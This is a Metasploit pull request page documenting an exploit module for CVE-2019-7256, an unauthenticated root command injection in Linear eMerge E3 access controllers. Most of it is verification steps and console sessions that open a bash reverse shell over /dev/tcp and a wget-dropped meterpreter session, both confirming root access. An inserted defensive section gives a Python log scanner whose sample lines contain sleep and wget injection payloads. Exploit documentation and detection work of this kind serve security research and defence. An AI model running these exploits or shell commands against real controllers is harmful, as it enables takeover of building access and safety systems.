
Pre-Authenticated Remote Code Execution in Nortek Linear eMerge Access Controller [CVE-2019-7256] #17312

Merged (7 commits), Jan 5, 2023

Conversation

@h00die-gr3y h00die-gr3y commented Nov 29, 2022

Nortek Security & Control, LLC (NSC) is a leader in wireless security, home automation and personal safety systems and devices. The eMerge E3-Series is part of Linear's access control platform, which delivers entry-level access control to buildings.
It is a web-based application whose HTTP web interface is typically exposed to the public internet.

The Linear eMerge E3-Series with firmware versions 1.00-06 and below is vulnerable to an unauthenticated command injection remote root exploit that leverages card_scan_decoder.php.
This can be exploited to inject and execute arbitrary shell commands as the root user through the No and door HTTP GET parameters.
A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with root privileges.

Building automation and access control systems are at the heart of many critical infrastructures, and their security is vital.
Executing attacks on these systems may enable unauthenticated attackers to access and manipulate doors, elevators, air-conditioning systems, cameras, boilers, lights, safety alarm systems within a building.

This issue affects all Linear eMerge E3 versions up to and including 1.00-06.

Installing a vulnerable test bed requires a Linear eMerge E3-Series access controller with the vulnerable software loaded.

This module has been tested against a Linear eMerge access controller with the specifications listed below:

  • Nortek Linear eMerge E3 Elite access controller
  • Firmware: v1.00-03

Verification

  • use exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256
  • set RHOSTS <TARGET HOSTS>
  • set RPORT <port>
  • set LHOST <attacker host ip>
  • set LPORT <attacker host port>
  • set TARGET <0-Unix command or 1-Linux Dropper>
  • exploit

You should get a bash shell or meterpreter session depending on the target and payload settings.

Options

No specific options.

Scenarios

Nortek Linear eMerge E3 Elite access controller bash reverse shell

msf6 > use exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > options

Module options (exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    80               yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine
                                       or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command


View the full module info with the info, or info -d command.

msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set rhosts 192.168.100.180
rhosts => 192.168.100.180
msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set lhost 192.168.100.254
lhost => 192.168.100.7
msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set lport 4444
lport => 4444
msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set target 0
target => 0
msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > exploit

[*] Started reverse TCP handler on 192.168.100.254:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.100.180:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 2 seconds.
[*] Elapsed time: 3.16 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing Unix Command with bash -c '0<&179-;exec 179<>/dev/tcp/192.168.100.254/4444;sh <&179 >&179 2>&179'
[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:54274) at 2022-12-01 18:51:54 +0000

uname -a
Linux cuckoo 3.14.54 #1 SMP PREEMPT Thu Dec 6 19:08:58 PST 2018 armv7l GNU/Linux
whoami
root
exit

Nortek Linear eMerge E3 Elite access controller meterpreter session

msf6 > use exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256
[*] Using configured payload linux/armle/meterpreter_reverse_tcp
msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > options

Module options (exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    80               yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine
                                       or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (linux/armle/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper


View the full module info with the info, or info -d command.

msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set rhosts 192.168.100.180
rhosts => 192.168.100.180
msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set lhost 192.168.100.254
lhost => 192.168.100.7
msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set lport 4444
lport => 4444
msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set target 1
target => 1
msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > exploit

[*] Started reverse TCP handler on 192.168.100.254:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.100.180:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 2 seconds.
[*] Elapsed time: 3.18 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing Linux Dropper
[*] Using URL: http://192.168.100.254:8080/n6tUft9RrS
[*] Client 127.0.0.1 (Wget) requested /n6tUft9RrS
[*] Sending payload to 127.0.0.1 (Wget)
[*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:49448) at 2022-12-01 18:50:26 +0000
[*] Command Stager progress - 100.00% done (125/125 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.100.180
OS           :  (Linux 3.14.54)
Architecture : armv7l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux
meterpreter > getuid
Server username: root

Limitations

Due to the limitations of the restricted BusyBox command implementation on the Linear eMerge E3 Access Controller, only a few Unix command payloads will work, such as cmd/unix/reverse_bash or cmd/unix/reverse (telnet).

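The description above names the vulnerable script and the two injected parameters, which is enough to write a detection for web server access logs on the controller or on a reverse proxy in front of it. The following is an added example from a defender's side, not code from this pull request or from the Metasploit module; the log lines are constructed for the demonstration, and the assumption that legitimate No and door values are plain integers is the author's, not something the page states.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed sample access-log lines in combined log format (not real traffic).
# Line 2 mirrors the module's sleep-based check; line 3 mirrors a wget dropper.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Dec/2022:18:51:50 +0000] "GET /card_scan_decoder.php?No=30&door=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Dec/2022:18:51:52 +0000] "GET /card_scan_decoder.php?No=30&door=%60sleep%202%60 HTTP/1.1" 200 0 "-" "curl/7.81.0"
10.0.0.9 - - [01/Dec/2022:18:51:54 +0000] "GET /card_scan_decoder.php?No=30%3Bwget%20http%3A%2F%2F192.0.2.10%3A8080%2Fx&door=1 HTTP/1.1" 200 0 "-" "Wget"
10.0.0.5 - - [01/Dec/2022:18:52:00 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Combined log format: source, ident, user, [timestamp], "METHOD URI PROTO", status
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)
# Shell metacharacters that have no business in a card number or door id.
INJECT_RE = re.compile(r'[;|&`\n]|\$\(|\$\{')
WATCHED_PARAMS = ("No", "door")


def suspicious_params(uri):
    """Return {param: decoded value} for watched parameters of a
    card_scan_decoder.php request that are not a plain integer or that
    carry shell metacharacters. Assumption: benign values are integers."""
    parts = urlsplit(uri)
    if not parts.path.endswith("/card_scan_decoder.php"):
        return {}
    qs = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes once
    hits = {}
    for name in WATCHED_PARAMS:
        for raw in qs.get(name, []):
            value = unquote_plus(raw)  # second decode catches double-encoded payloads
            if not value.isdigit() or INJECT_RE.search(value):
                hits[name] = value
    return hits


def scan_log(text):
    """Return a list of (source ip, timestamp, http status, hits) for every
    request in the log text that looks like an injection attempt."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = suspicious_params(m.group("uri"))
        if hits:
            alerts.append((m.group("src"), m.group("ts"), int(m.group("status")), hits))
    return alerts


if __name__ == "__main__":
    for src, ts, status, hits in scan_log(SAMPLE_LOG):
        print(f"[!] {ts} {src} card_scan_decoder.php injection attempt {hits} (HTTP {status})")
```

A 200 response to such a request is the more worrying case, since the page describes the injection as unauthenticated; blocked or 4xx responses from an upstream filter still record the attempt.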
@h00die-gr3y h00die-gr3y marked this pull request as draft November 29, 2022 10:43
@bcoles bcoles added the module label Nov 29, 2022
@h00die-gr3y h00die-gr3y marked this pull request as ready for review December 1, 2022 19:36
@h00die-gr3y (author)

Gents are we still moving on this module?

@gwillcox-r7 gwillcox-r7 self-assigned this Dec 15, 2022

gwillcox-r7 commented Dec 29, 2022

@h00die-gr3y Sorry for the delay; most of the team has been out on holiday, and we also had end-of-year tasks that kept us from getting to this. Will take a look at this today/tomorrow once I've finished reviewing another PR.

@gwillcox-r7

Alright, looks like everything should be good now. Also rebased to make sure there were no merge conflicts and to squash 2 commits down. Will land once tests pass.


gwillcox-r7 commented Jan 5, 2023

Woot, all tests passed; will land this now. Thanks for your help and time on this PR @h00die-gr3y!

@gwillcox-r7 gwillcox-r7 added the rn-modules release notes for new or majorly enhanced modules label Jan 5, 2023
@gwillcox-r7 gwillcox-r7 merged commit ddc3435 into rapid7:master Jan 5, 2023
@gwillcox-r7

Release Notes

An exploit has been added for CVE-2019-7256, an unauthenticated command injection vulnerability in Linear eMerge E3 versions 1.00-06 and below in the No and door parameters of card_scan_decoder.php. Successful exploitation results in RCE as the root user.
